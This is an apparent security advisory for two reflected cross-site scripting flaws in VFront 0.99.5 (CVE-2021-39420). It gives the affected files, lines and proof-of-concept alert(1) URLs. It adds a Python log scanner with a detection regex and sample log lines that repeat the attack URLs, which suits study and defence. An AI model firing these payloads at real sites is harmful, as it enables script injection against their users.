Cross site scripting in VFront v0.99.5

Multiple cross site scripting vulnerabilities are present in VFront 0.99.5. The following is detailed information about these vulnerabilities:

file: search_all.php
line: 104
exploit: http://localhost/vfront-0.99.51/search_all.php?s=%22alert(1);

file: add.attach.php
line: 351
exploit: http://localhost/vfront-0.99.51/add.attach.php?feed=ko&id=1&t=tabella&msg=alert(1);
note: the parameter 't' must be the name of an existing table in the database managed by VFront.
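
For detection, the following Python script (an added example, not part of the original advisory or of VFront's code) scans web server access logs for requests to the two files listed above whose reflected parameter (`s` or `msg`) carries markup or script-like content. The combined log format, the sample lines and the matching heuristic are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script name -> reflected parameter, taken from the advisory entries above.
REFLECTED = {"search_all.php": "s", "add.attach.php": "msg"}

# Heuristic (assumption of this example): HTML/JS metacharacters, or a
# function-call shape, inside a value that should be plain text.
SUSPICIOUS = re.compile(r"""[<>"'`]|\b[A-Za-z_][\w.]*\s*\(""")

# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(log_line):
    """Return [(script, param, decoded_value)] for flagged values in one line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    param = REFLECTED.get(script)
    if param is None:
        return []
    # parse_qs percent-decodes, so %22 is inspected as a literal double quote.
    values = parse_qs(url.query, keep_blank_values=True).get(param, [])
    return [(script, param, v) for v in values if SUSPICIOUS.search(v)]


def scan(lines):
    """Return [(line_number, script, param, decoded_value)] over a whole log."""
    return [(n,) + hit
            for n, line in enumerate(lines, 1)
            for hit in suspicious_params(line)]


# Constructed sample log: two benign requests and the two advisory URLs.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2021:10:00:00 +0000] "GET /vfront-0.99.51/search_all.php?s=invoice+2021 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Sep/2021:10:00:05 +0000] "GET /vfront-0.99.51/search_all.php?s=%22alert(1); HTTP/1.1" 200 5340',
    '192.0.2.11 - - [01/Sep/2021:10:00:09 +0000] "GET /vfront-0.99.51/add.attach.php?feed=ko&id=1&t=tabella&msg=alert(1); HTTP/1.1" 200 2210',
    '192.0.2.12 - - [01/Sep/2021:10:01:00 +0000] "GET /vfront-0.99.51/add.attach.php?feed=ok&id=1&t=tabella&msg=File+uploaded HTTP/1.1" 200 2190',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The heuristic will also flag legitimate searches that contain quotes or parentheses, so treat hits as leads for review rather than confirmed attempts.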

The above vulnerabilities are published as CVE-2021-39420.

This vulnerability was detected as part of the DARPA CHESS program.